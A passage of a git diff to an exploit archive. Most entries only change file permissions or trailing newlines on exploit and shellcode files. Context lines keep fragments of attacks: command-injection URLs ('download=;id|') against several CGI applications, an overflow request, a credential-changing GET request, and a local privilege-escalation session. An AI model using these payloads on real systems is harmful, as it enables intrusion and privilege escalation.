+https://www.example.com/bugzilla-tip/report.cgi?x_axis_field=short_desc&y_axis_field=short_desc&z_axis_field=short_desc&no_redirect=1&query_format=report-table&short_desc_type=allwordssubstr&short_desc=&resolution=---&longdesc_type=allwordssubstr&longdesc=&bug_file_loc_type=allwordssubstr&bug_file_loc=&status_whiteboard_type=allwordssubstr&status_whiteboard=&keywords_type=allwords&keywords=&deadlinefrom=&deadlineto=&bug_id=22386%2C22387&bug_id_type=anyexact&emailassigned_to1=1&emailtype1=substring&email1=&emailassigned_to2=1&emailreporter2=1&emailqa_contact2=1&emailcc2=1&emailtype2=substring&email2=&emaillongdesc3=1&emailtype3=substring&email3=&chfieldvalue=&chfieldfrom=&chfieldto=Now&j_top=AND&f1=noop&o1=noop&v1=&format=table&action=wrap \ No newline at end of file diff --git a/platforms/cgi/webapps/38882.txt b/platforms/cgi/webapps/38882.txt old mode 100755 new mode 100644 index fbaeb0c2d..3c49f15cb --- a/platforms/cgi/webapps/38882.txt +++ b/platforms/cgi/webapps/38882.txt @@ -4,4 +4,4 @@ Icinga is prone to multiple memory-corruption vulnerabilities due to an off-by-o Attackers may exploit these issues to gain access to sensitive information or crash the affected application, denying service to legitimate users. -http://www.example.com/cgi-bin/config.cgi?b=aaaa[..2000 times] \ No newline at end of file +http://www.example.com/cgi-bin/config.cgi?b=aaaa[..2000 times] \ No newline at end of file diff --git a/platforms/cgi/webapps/39127.txt b/platforms/cgi/webapps/39127.txt old mode 100755 new mode 100644 index dd24a2d8f..158413180 --- a/platforms/cgi/webapps/39127.txt +++ b/platforms/cgi/webapps/39127.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary commands in the context innoEDIT 6.2 is vulnerable; other versions may also be affected. -http://www.example.com/innoedit/innoedit.cgi?download=;id| \ No newline at end of file +http://www.example.com/innoedit/innoedit.cgi?download=;id| \ No newline at end of file diff --git a/platforms/cgi/webapps/39130.txt b/platforms/cgi/webapps/39130.txt old mode 100755 new mode 100644 index 2cffafb00..b83f6b87f --- a/platforms/cgi/webapps/39130.txt +++ b/platforms/cgi/webapps/39130.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary commands in the context DotItYourself 6.11.060830 is vulnerable; other versions may also be affected. -http://www.example.com/cade/dot-it-yourself.cgi?download=;id| \ No newline at end of file +http://www.example.com/cade/dot-it-yourself.cgi?download=;id| \ No newline at end of file diff --git a/platforms/cgi/webapps/39131.txt b/platforms/cgi/webapps/39131.txt old mode 100755 new mode 100644 index 2e90a63c9..c7e0a48a3 --- a/platforms/cgi/webapps/39131.txt +++ b/platforms/cgi/webapps/39131.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary commands in the context Beheer Systeem 6.1 is vulnerable; other versions may also be affected. -http://www.example.com/!/pbs.cgi?download=;id| \ No newline at end of file +http://www.example.com/!/pbs.cgi?download=;id| \ No newline at end of file diff --git a/platforms/cgi/webapps/39137.txt b/platforms/cgi/webapps/39137.txt old mode 100755 new mode 100644 index a7ce061fa..673f3fdbb --- a/platforms/cgi/webapps/39137.txt +++ b/platforms/cgi/webapps/39137.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary commands in the context Primo Interactive CMS 6.2 is vulnerable; other versions may also be affected. -http://www.example.com/cgi-bin/pcm.cgi?download=;id| \ No newline at end of file +http://www.example.com/cgi-bin/pcm.cgi?download=;id| \ No newline at end of file diff --git a/platforms/cgi/webapps/39145.txt b/platforms/cgi/webapps/39145.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/39156.txt b/platforms/cgi/webapps/39156.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/39701.txt b/platforms/cgi/webapps/39701.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/39746.txt b/platforms/cgi/webapps/39746.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/39762.txt b/platforms/cgi/webapps/39762.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/39765.txt b/platforms/cgi/webapps/39765.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/39871.txt b/platforms/cgi/webapps/39871.txt old mode 100755 new mode 100644 index f82b10469..5f5225ef3 --- a/platforms/cgi/webapps/39871.txt +++ b/platforms/cgi/webapps/39871.txt @@ -41,6 +41,4 @@ Raw Response: MTI3LjAuMC4xCWxvY2FsaG9zdC5sb2NhbGRvbWFpbglsb2NhbGhvc3QK - Base64 Decoded: 127.0.0.1 localhost.localdomain localhost - - \ No newline at end of file + Base64 Decoded: 127.0.0.1 localhost.localdomain localhost \ No newline at end of file diff --git a/platforms/cgi/webapps/39887.txt b/platforms/cgi/webapps/39887.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40044.html b/platforms/cgi/webapps/40044.html old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40063.txt b/platforms/cgi/webapps/40063.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40112.txt b/platforms/cgi/webapps/40112.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40165.txt b/platforms/cgi/webapps/40165.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40166.txt b/platforms/cgi/webapps/40166.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40205.txt b/platforms/cgi/webapps/40205.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40213.txt b/platforms/cgi/webapps/40213.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40254.txt b/platforms/cgi/webapps/40254.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40261.txt b/platforms/cgi/webapps/40261.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40262.txt b/platforms/cgi/webapps/40262.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40263.txt b/platforms/cgi/webapps/40263.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40264.txt b/platforms/cgi/webapps/40264.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40265.txt b/platforms/cgi/webapps/40265.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40266.txt b/platforms/cgi/webapps/40266.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40267.txt b/platforms/cgi/webapps/40267.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40269.txt b/platforms/cgi/webapps/40269.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40272.txt b/platforms/cgi/webapps/40272.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40273.txt b/platforms/cgi/webapps/40273.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40274.txt b/platforms/cgi/webapps/40274.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40281.txt b/platforms/cgi/webapps/40281.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40282.txt b/platforms/cgi/webapps/40282.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40283.txt b/platforms/cgi/webapps/40283.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40303.sh b/platforms/cgi/webapps/40303.sh index 1665cc129..f78fae8cd 100755 --- a/platforms/cgi/webapps/40303.sh +++ b/platforms/cgi/webapps/40303.sh @@ -42,5 +42,4 @@ if [ $? -ne 0 ]; then echo " [ Error : libwww-perl not found =/" exit; fi - GET -H "Cookie: frame_rate=8; expansion=10; mode=43; user_id=guest; user_auth_level=43; behind_firewall=0" "http://$1/userconfigsubmit.cgi?adminid=$2&adpasswd=$3&repasswd=$3&user1=guest&userpw1=1337&repasswd1=1337&max_frame_user1=8&authority1=41&user2=&userpw2=&repasswd2=&max_frame_user2=6&authority2=40&user3=&userpw3=&repasswd3=&max_frame_user3=6&authority3=40&user4=&userpw4=&repasswd4=&max_frame_user4=6&authority4=40&user5=&userpw5=&repasswd5=&max_frame_user5=6&authority5=40&submit=submit" 0&> /dev/null <&1 - \ No newline at end of file + GET -H "Cookie: frame_rate=8; expansion=10; mode=43; user_id=guest; user_auth_level=43; behind_firewall=0" "http://$1/userconfigsubmit.cgi?adminid=$2&adpasswd=$3&repasswd=$3&user1=guest&userpw1=1337&repasswd1=1337&max_frame_user1=8&authority1=41&user2=&userpw2=&repasswd2=&max_frame_user2=6&authority2=40&user3=&userpw3=&repasswd3=&max_frame_user3=6&authority3=40&user4=&userpw4=&repasswd4=&max_frame_user4=6&authority4=40&user5=&userpw5=&repasswd5=&max_frame_user5=6&authority5=40&submit=submit" 0&> /dev/null <&1 \ No newline at end of file diff --git a/platforms/cgi/webapps/40304.txt b/platforms/cgi/webapps/40304.txt old mode 100755 new mode 100644 index d1826af3a..a7584f5ca --- a/platforms/cgi/webapps/40304.txt +++ b/platforms/cgi/webapps/40304.txt @@ -31,5 +31,4 @@ path=/ #root:x:0:0:root:/root:/bin/sh #root:x:0:0:root:/root:/usr/bin/cmd #tw:x:504:504::/home/tw:/bin/bash -#tw:x:504:504::/home/tw:/bin/msh - \ No newline at end of file +#tw:x:504:504::/home/tw:/bin/msh \ No newline at end of file diff --git a/platforms/cgi/webapps/40463.txt b/platforms/cgi/webapps/40463.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40464.txt b/platforms/cgi/webapps/40464.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/407.txt b/platforms/cgi/webapps/407.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/40889.txt b/platforms/cgi/webapps/40889.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/41179.txt b/platforms/cgi/webapps/41179.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/41578.txt b/platforms/cgi/webapps/41578.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/41842.txt b/platforms/cgi/webapps/41842.txt old mode 100755 new mode 100644 index a5deffe53..ed5b004ec --- a/platforms/cgi/webapps/41842.txt +++ b/platforms/cgi/webapps/41842.txt @@ -194,4 +194,4 @@ Timeline 15.03.2017 sent update to CERT-FI 21.03.2017 vendor released NAS-201703-21 advisory: https://www.qnap.com/en/support/con_show.php?cid=113 -06.04.2017 public release of the advisory \ No newline at end of file +06.04.2017 public release of the advisory \ No newline at end of file diff --git a/platforms/cgi/webapps/42130.txt b/platforms/cgi/webapps/42130.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/42342.txt b/platforms/cgi/webapps/42342.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/42346.txt b/platforms/cgi/webapps/42346.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/4261.txt b/platforms/cgi/webapps/4261.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/4264.txt b/platforms/cgi/webapps/4264.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/4286.txt b/platforms/cgi/webapps/4286.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/42989.txt b/platforms/cgi/webapps/42989.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/43013.txt b/platforms/cgi/webapps/43013.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/4343.txt b/platforms/cgi/webapps/4343.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/4529.txt b/platforms/cgi/webapps/4529.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/464.txt b/platforms/cgi/webapps/464.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/4647.txt b/platforms/cgi/webapps/4647.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/4977.txt b/platforms/cgi/webapps/4977.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/53.c b/platforms/cgi/webapps/53.c old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/5304.txt b/platforms/cgi/webapps/5304.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/5662.txt b/platforms/cgi/webapps/5662.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/6269.txt b/platforms/cgi/webapps/6269.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/6509.txt b/platforms/cgi/webapps/6509.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/659.txt b/platforms/cgi/webapps/659.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/6771.txt b/platforms/cgi/webapps/6771.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/6845.txt b/platforms/cgi/webapps/6845.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/6864.txt b/platforms/cgi/webapps/6864.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/7404.txt b/platforms/cgi/webapps/7404.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/772.c b/platforms/cgi/webapps/772.c old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/8085.txt b/platforms/cgi/webapps/8085.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/8086.txt b/platforms/cgi/webapps/8086.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/8087.txt b/platforms/cgi/webapps/8087.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/8247.txt b/platforms/cgi/webapps/8247.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/840.c b/platforms/cgi/webapps/840.c old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/853.c b/platforms/cgi/webapps/853.c old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/862.txt b/platforms/cgi/webapps/862.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/8895.txt b/platforms/cgi/webapps/8895.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/8987.txt b/platforms/cgi/webapps/8987.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/9074.txt b/platforms/cgi/webapps/9074.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/9140.txt b/platforms/cgi/webapps/9140.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/9357.txt b/platforms/cgi/webapps/9357.txt old mode 100755 new mode 100644 diff --git a/platforms/freebsd/dos/12762.txt b/platforms/freebsd/dos/12762.txt old mode 100755 new mode 100644 diff --git a/platforms/freebsd/dos/14003.c b/platforms/freebsd/dos/14003.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/dos/19130.c b/platforms/freebsd/dos/19130.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/dos/19505.c b/platforms/freebsd/dos/19505.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/dos/19687.c b/platforms/freebsd/dos/19687.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/dos/20226.c b/platforms/freebsd/dos/20226.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/dos/21512.txt b/platforms/freebsd/dos/21512.txt old mode 100755 new mode 100644 diff --git a/platforms/freebsd/dos/23540.c b/platforms/freebsd/dos/23540.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/dos/24233.c b/platforms/freebsd/dos/24233.c old mode 100755 new mode 100644 index e28446762..ba2d9a64e --- a/platforms/freebsd/dos/24233.c +++ b/platforms/freebsd/dos/24233.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/10596/info @@ -6,6 +7,7 @@ It is reported that FreeBSD running on the Alpha architecture is susceptible to An attacker with local interactive user-level access on an affected machine is reportedly able to crash FreeBSD when running on the Alpha architecture, denying service to legitimate users. FreeBSD 5.1-RELEASE/Alpha is reported vulnerable, other architectures with strict memory alignment requirements are also likely vulnerable. IA32 is reported immune. Versions other than 5.1-RELEASE are likely affected as well. +*/ /* * FreeBSD/Alpha local DoS diff --git a/platforms/freebsd/dos/24450.txt b/platforms/freebsd/dos/24450.txt old mode 100755 new mode 100644 diff --git a/platforms/freebsd/dos/28648.c b/platforms/freebsd/dos/28648.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/dos/28812.c b/platforms/freebsd/dos/28812.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/dos/28813.c b/platforms/freebsd/dos/28813.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/dos/35938.txt b/platforms/freebsd/dos/35938.txt old mode 100755 new mode 100644 diff --git a/platforms/freebsd/dos/8259.c b/platforms/freebsd/dos/8259.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/dos/9134.c b/platforms/freebsd/dos/9134.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/dos/9206.c b/platforms/freebsd/dos/9206.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/dos/9373.c b/platforms/freebsd/dos/9373.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/12090.txt b/platforms/freebsd/local/12090.txt old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/12091.txt b/platforms/freebsd/local/12091.txt old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/14002.c b/platforms/freebsd/local/14002.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/14688.c b/platforms/freebsd/local/14688.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/16119.c b/platforms/freebsd/local/16119.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/19346.c b/platforms/freebsd/local/19346.c old mode 100755 new mode 100644 index f962d804d..8791d8038 --- a/platforms/freebsd/local/19346.c +++ b/platforms/freebsd/local/19346.c @@ -27,4 +27,4 @@ exit(1); sleep(100); exit(0); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/freebsd/local/19504.c b/platforms/freebsd/local/19504.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/19609.txt b/platforms/freebsd/local/19609.txt old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/19649.c b/platforms/freebsd/local/19649.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/19650.txt b/platforms/freebsd/local/19650.txt old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/19651.txt b/platforms/freebsd/local/19651.txt old mode 100755 new mode 100644 index 30d51e93d..62858eb82 --- a/platforms/freebsd/local/19651.txt +++ b/platforms/freebsd/local/19651.txt @@ -7,4 +7,4 @@ One of the methods to exploit seyon is shown below: bash-2.03$ echo 'void main() { system("/usr/bin/id"); }' > id.c bash-2.03$ gcc -o id id.c bash-2.03$ seyon -emulator ./id -uid=1000(xnec) gid=1000(xnec) egid=68(dialer) groups=68(dialer), 1000(xnec) \ No newline at end of file +uid=1000(xnec) gid=1000(xnec) egid=68(dialer) groups=68(dialer), 1000(xnec) \ No newline at end of file diff --git a/platforms/freebsd/local/19652.c b/platforms/freebsd/local/19652.c old mode 100755 new mode 100644 index e525bd79e..fe9d71ecf --- a/platforms/freebsd/local/19652.c +++ b/platforms/freebsd/local/19652.c @@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/839/info The version of xmindpath shipped with FreeBSD 3.3 can be locally exploited via overrunning a buffer of predefined length. It is possible to gain the effective userid of uucp through this vulnerability. It may be possible, after attaining uucp priviliges, to modify binaries to which uucp has write access to and trojan them to further elevate priviliges), ie: modify minicom so that when root runs it, drops a suid shell somewhere. +*/ /* * diff --git a/platforms/freebsd/local/19653.c b/platforms/freebsd/local/19653.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/19685.txt b/platforms/freebsd/local/19685.txt old mode 100755 new mode 100644 index 94ee22a2a..28c8edde3 --- a/platforms/freebsd/local/19685.txt +++ b/platforms/freebsd/local/19685.txt @@ -11,4 +11,4 @@ Monitoring 2 devices for activity. {Left-click on the little window that appears} current stat is :1 $ id -uid=1000(steve) gid=1000(steve) egid=2(kmem) groups=2(kmem), 1000(steve) \ No newline at end of file +uid=1000(steve) gid=1000(steve) egid=2(kmem) groups=2(kmem), 1000(steve) \ No newline at end of file diff --git a/platforms/freebsd/local/19756.txt b/platforms/freebsd/local/19756.txt old mode 100755 new mode 100644 index 556aefd4f..d2edcc339 --- a/platforms/freebsd/local/19756.txt +++ b/platforms/freebsd/local/19756.txt @@ -6,4 +6,4 @@ It should be noted that neither of these programs are truly part of FreeBSD. The Exploit: -asmon -e "xterm" \ No newline at end of file +asmon -e "xterm" \ No newline at end of file diff --git a/platforms/freebsd/local/20377.c b/platforms/freebsd/local/20377.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/21114.txt b/platforms/freebsd/local/21114.txt old mode 100755 new mode 100644 index 6e1b375b3..81496d8ad --- a/platforms/freebsd/local/21114.txt +++ b/platforms/freebsd/local/21114.txt @@ -16,4 +16,4 @@ or Otherwise, if accessing the system via login, make the following entry in a .login.conf: -default: :nologin=/etc/master.passwd: \ No newline at end of file +default: :nologin=/etc/master.passwd: \ No newline at end of file diff --git a/platforms/freebsd/local/21176.c b/platforms/freebsd/local/21176.c old mode 100755 new mode 100644 index e8686ed54..d956d9d13 --- a/platforms/freebsd/local/21176.c +++ b/platforms/freebsd/local/21176.c @@ -123,4 +123,4 @@ main (argc, argv) /* * vim: ts=8 - */ \ No newline at end of file + */ \ No newline at end of file diff --git a/platforms/freebsd/local/21798.txt b/platforms/freebsd/local/21798.txt old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/21799.txt b/platforms/freebsd/local/21799.txt old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/22580.c b/platforms/freebsd/local/22580.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/22614.c b/platforms/freebsd/local/22614.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/22615.c b/platforms/freebsd/local/22615.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/22661.c b/platforms/freebsd/local/22661.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/26368.c b/platforms/freebsd/local/26368.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/28718.c b/platforms/freebsd/local/28718.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/32946.c b/platforms/freebsd/local/32946.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/7581.c b/platforms/freebsd/local/7581.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/8055.txt b/platforms/freebsd/local/8055.txt old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/8261.c b/platforms/freebsd/local/8261.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/9082.c b/platforms/freebsd/local/9082.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/9488.c b/platforms/freebsd/local/9488.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/9859.c b/platforms/freebsd/local/9859.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/local/9860.c b/platforms/freebsd/local/9860.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/remote/15723.c b/platforms/freebsd/remote/15723.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/remote/17462.txt b/platforms/freebsd/remote/17462.txt old mode 100755 new mode 100644 diff --git a/platforms/freebsd/remote/18181.txt b/platforms/freebsd/remote/18181.txt old mode 100755 new mode 100644 diff --git a/platforms/freebsd/remote/20593.txt b/platforms/freebsd/remote/20593.txt old mode 100755 new mode 100644 diff --git a/platforms/freebsd/remote/20732.pl b/platforms/freebsd/remote/20732.pl index 11b3e76e5..28bf65a0c 100755 --- a/platforms/freebsd/remote/20732.pl +++ b/platforms/freebsd/remote/20732.pl @@ -162,4 +162,4 @@ close SOCKET; exit; --- \ No newline at end of file +-- \ No newline at end of file diff --git a/platforms/freebsd/remote/21614.c b/platforms/freebsd/remote/21614.c old mode 100755 new mode 100644 index b44a4b2ce..2155974f6 --- a/platforms/freebsd/remote/21614.c +++ b/platforms/freebsd/remote/21614.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/5215/info ATPhttpd is a small webserver designed for high-performance. It was developed by Yann Ramin. There exist several exploitable buffer overflow conditions in ATPhttpd. Remote attackers may levarage these vulnerabilities to gain access on affected servers. +*/ /* atphttpd exploit. / The exploit sucks, if you get it wrong the first time the server just dies diff --git a/platforms/freebsd/remote/25687.c b/platforms/freebsd/remote/25687.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd/remote/9278.txt b/platforms/freebsd/remote/9278.txt old mode 100755 new mode 100644 diff --git a/platforms/freebsd/shellcode/13261.txt b/platforms/freebsd/shellcode/13261.txt old mode 100755 new mode 100644 diff --git a/platforms/freebsd/webapps/12658.txt b/platforms/freebsd/webapps/12658.txt old mode 100755 new mode 100644 diff --git a/platforms/freebsd/webapps/23202.txt b/platforms/freebsd/webapps/23202.txt old mode 100755 new mode 100644 diff --git a/platforms/freebsd/webapps/24439.txt b/platforms/freebsd/webapps/24439.txt old mode 100755 new mode 100644 index 13fb56b2d..92421795c --- a/platforms/freebsd/webapps/24439.txt +++ b/platforms/freebsd/webapps/24439.txt @@ -48,5 +48,4 @@ ┌──────────────────┘ Dimitris Strevinas Obrela Security Industries - CONTACT: www.obrela.com - \ No newline at end of file + CONTACT: www.obrela.com \ No newline at end of file diff --git a/platforms/freebsd_x86-64/dos/39570.c b/platforms/freebsd_x86-64/dos/39570.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd_x86-64/shellcode/13279.c b/platforms/freebsd_x86-64/shellcode/13279.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd_x86-64/shellcode/13280.c b/platforms/freebsd_x86-64/shellcode/13280.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd_x86/dos/42277.c b/platforms/freebsd_x86/dos/42277.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd_x86/dos/42278.c b/platforms/freebsd_x86/dos/42278.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd_x86/dos/42279.c b/platforms/freebsd_x86/dos/42279.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd_x86/shellcode/13262.txt b/platforms/freebsd_x86/shellcode/13262.txt old mode 100755 new mode 100644 diff --git a/platforms/freebsd_x86/shellcode/13263.txt b/platforms/freebsd_x86/shellcode/13263.txt old mode 100755 new mode 100644 diff --git a/platforms/freebsd_x86/shellcode/13264.txt b/platforms/freebsd_x86/shellcode/13264.txt old mode 100755 new mode 100644 diff --git a/platforms/freebsd_x86/shellcode/13265.c b/platforms/freebsd_x86/shellcode/13265.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd_x86/shellcode/13266.asm b/platforms/freebsd_x86/shellcode/13266.asm old mode 100755 new mode 100644 diff --git a/platforms/freebsd_x86/shellcode/13267.asm b/platforms/freebsd_x86/shellcode/13267.asm old mode 100755 new mode 100644 diff --git a/platforms/freebsd_x86/shellcode/13268.asm b/platforms/freebsd_x86/shellcode/13268.asm old mode 100755 new mode 100644 diff --git a/platforms/freebsd_x86/shellcode/13269.c b/platforms/freebsd_x86/shellcode/13269.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd_x86/shellcode/13270.c b/platforms/freebsd_x86/shellcode/13270.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd_x86/shellcode/13271.c b/platforms/freebsd_x86/shellcode/13271.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd_x86/shellcode/13272.c b/platforms/freebsd_x86/shellcode/13272.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd_x86/shellcode/13273.c b/platforms/freebsd_x86/shellcode/13273.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd_x86/shellcode/13274.c b/platforms/freebsd_x86/shellcode/13274.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd_x86/shellcode/13275.c b/platforms/freebsd_x86/shellcode/13275.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd_x86/shellcode/13276.c b/platforms/freebsd_x86/shellcode/13276.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd_x86/shellcode/13277.c b/platforms/freebsd_x86/shellcode/13277.c old mode 100755 new mode 100644 diff --git a/platforms/freebsd_x86/shellcode/13278.asm b/platforms/freebsd_x86/shellcode/13278.asm old mode 100755 new mode 100644 diff --git a/platforms/freebsd_x86/shellcode/13570.c b/platforms/freebsd_x86/shellcode/13570.c old mode 100755 new mode 100644 diff --git a/platforms/generator/shellcode/13281.c b/platforms/generator/shellcode/13281.c old mode 100755 new mode 100644 diff --git a/platforms/generator/shellcode/13282.php b/platforms/generator/shellcode/13282.php old mode 100755 new mode 100644 diff --git a/platforms/generator/shellcode/13283.php b/platforms/generator/shellcode/13283.php old mode 100755 new mode 100644 diff --git a/platforms/generator/shellcode/13284.txt b/platforms/generator/shellcode/13284.txt old mode 100755 new mode 100644 diff --git a/platforms/generator/shellcode/13285.c b/platforms/generator/shellcode/13285.c old mode 100755 new mode 100644 diff --git a/platforms/generator/shellcode/13286.c b/platforms/generator/shellcode/13286.c old mode 100755 new mode 100644 diff --git a/platforms/generator/shellcode/13288.c b/platforms/generator/shellcode/13288.c old mode 100755 new mode 100644 diff --git a/platforms/generator/shellcode/13289.c b/platforms/generator/shellcode/13289.c old mode 100755 new mode 100644 diff --git a/platforms/generator/shellcode/13297.c b/platforms/generator/shellcode/13297.c old mode 100755 new mode 100644 diff --git a/platforms/generator/shellcode/13328.c b/platforms/generator/shellcode/13328.c old mode 100755 new mode 100644 diff --git a/platforms/generator/shellcode/13364.c b/platforms/generator/shellcode/13364.c old mode 100755 new mode 100644 diff --git a/platforms/generator/shellcode/13401.c b/platforms/generator/shellcode/13401.c old mode 100755 new mode 100644 diff --git a/platforms/generator/shellcode/13491.c b/platforms/generator/shellcode/13491.c old mode 100755 new mode 100644 diff --git a/platforms/generator/shellcode/13498.php b/platforms/generator/shellcode/13498.php old mode 100755 new mode 100644 diff 